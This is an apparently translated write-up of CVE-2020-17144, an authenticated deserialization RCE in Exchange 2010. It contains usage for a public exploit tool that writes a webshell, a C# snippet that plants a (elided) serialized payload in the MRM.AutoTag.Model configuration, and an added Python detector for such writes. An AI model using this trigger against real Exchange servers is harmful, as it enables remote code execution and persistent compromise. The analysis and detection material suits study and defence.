Like CVE-2018-8302 and CVE-2020-0688, CVE-2020-17144 is a deserialization vulnerability that can only be exploited after authentication, but it affects Exchange 2010 servers only.
Unlike CVE-2020-0688, because of the vulnerability's interesting root cause and trigger conditions, exploitation does not require a plaintext password: an NTHash is enough, which makes the exploitation path comparatively more flexible. In addition, the vulnerable feature itself provides persistence: a successful exploit is persisted directly and, as long as the vulnerability is left unpatched, remains in place indefinitely. Its impact and stealthiness are therefore far greater than those of CVE-2020-0688.
internal bool LoadModel(out LearningModel learningModel, out MessageTransformer messageTransformer, bool parseFai)
{
    ...
    // userConfiguration is read from the mailbox, where any authenticated user can write it
    return DeserializeModelFAI(userConfiguration, out learningModel, out messageTransformer);
    ...
}
DeserializeModelFAI receives the user-controllable personal configuration (user configuration) directly as a parameter, which leads to RCE.
CVE-2020-17144-EXP
Requirements: Exchange 2010; an ordinary user account
Default usage (writes a webshell): CVE-2020-17144-EXP.exe mail.example.com user pass
Command execution & port reuse: modify ExploitClass.cs
Reference: @zcgonvh
https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483712&idx=1&sn=0b2cc3c9692f5c58a4eeb246d4b392fc&chksm=eaa5bb60ddd23276baf4cfd3fc59ca847c28f350c65ef98a17d49bc9944d653fad95dec4fd14&mpshare=1&scene=1&srcid=1209jtbQLVJIgr3VT0Ut1TM9&sharer_sharetime=1607483575995&sharer_shareid=dc9cecc79ba34e4bbb700a43a16153fd#rd
using Microsoft.Exchange.WebServices.Data;   // EWS Managed API

ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2010);
service.Credentials = new WebCredentials("zcgonvh", "P@ssw0rd!");
service.Url = new Uri("https://target/ews/Exchange.asmx");
{
    byte[] data = EVIL-SERIALIZED-BUFFER;   // serialized payload, elided in the original write-up
    UserConfiguration u = null;
    Folder folder = Folder.Bind(service, WellKnownFolderName.Inbox);
    u = new UserConfiguration(service);
    u.BinaryData = data;
    // The user configuration named MRM.AutoTag.Model is what LoadModel / DeserializeModelFAI later reads
    u.Save("MRM.AutoTag.Model", folder.Id);
}
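As an added defensive example (not part of the original write-up or the exploit repository), the following Python script inspects a captured EWS SOAP request and flags CreateUserConfiguration / UpdateUserConfiguration writes that target the MRM.AutoTag.Model user configuration with BinaryData, which is exactly the write the snippet above performs. The SOAP element names follow the EWS schema as I recall it and are matched by local name to avoid namespace-prefix assumptions; the sample requests and payload bytes are constructed.

```python
import base64
import xml.etree.ElementTree as ET

# The FAI user configuration the exploit writes to; its BinaryData is what DeserializeModelFAI consumes.
SUSPECT_CONFIG_NAME = "MRM.AutoTag.Model"
WRITE_OPERATIONS = {"CreateUserConfiguration", "UpdateUserConfiguration"}


def _local(tag):
    """Strip the XML namespace so matching does not depend on the client's prefix choices."""
    return tag.rsplit("}", 1)[-1]


def find_suspect_writes(soap_xml):
    """Return one finding per user-configuration write that names MRM.AutoTag.Model and carries BinaryData."""
    findings = []
    for op in ET.fromstring(soap_xml).iter():
        if _local(op.tag) not in WRITE_OPERATIONS:
            continue
        for cfg in op.iter():
            if _local(cfg.tag) != "UserConfiguration":
                continue
            name, data_b64 = None, ""
            for child in cfg:
                if _local(child.tag) == "UserConfigurationName":
                    name = child.get("Name")
                elif _local(child.tag) == "BinaryData":
                    data_b64 = (child.text or "").strip()
            if name == SUSPECT_CONFIG_NAME and data_b64:
                findings.append({"operation": _local(op.tag), "name": name,
                                 "binary_length": len(base64.b64decode(data_b64))})
    return findings


# Constructed sample requests (not real captures); the payload bytes are arbitrary filler.
_ENVELOPE = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"'
             ' xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"'
             ' xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">'
             '<soap:Body>{}</soap:Body></soap:Envelope>')
SUSPECT_REQUEST = _ENVELOPE.format(
    '<m:CreateUserConfiguration><m:UserConfiguration>'
    '<t:UserConfigurationName Name="MRM.AutoTag.Model"><t:DistinguishedFolderId Id="inbox"/></t:UserConfigurationName>'
    '<t:BinaryData>' + base64.b64encode(b"not-a-real-payload" * 4).decode() + '</t:BinaryData>'
    '</m:UserConfiguration></m:CreateUserConfiguration>')
BENIGN_REQUEST = _ENVELOPE.format(
    '<m:CreateUserConfiguration><m:UserConfiguration>'
    '<t:UserConfigurationName Name="OWA.UserOptions"><t:DistinguishedFolderId Id="root"/></t:UserConfigurationName>'
    '<t:Dictionary/></m:UserConfiguration></m:CreateUserConfiguration>')

if __name__ == "__main__":
    for label, req in (("suspect", SUSPECT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, find_suspect_writes(req))
```

Any hit on an unpatched Exchange 2010 server is worth treating as a persistence attempt, since the saved object is deserialized again on every subsequent LoadModel call.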
ref:
https://github.com/Airboi/CVE-2020-17144-EXP
https://mp.weixin.qq.com/s/nVtE-OFoO076x6T0147AMw
陈师傅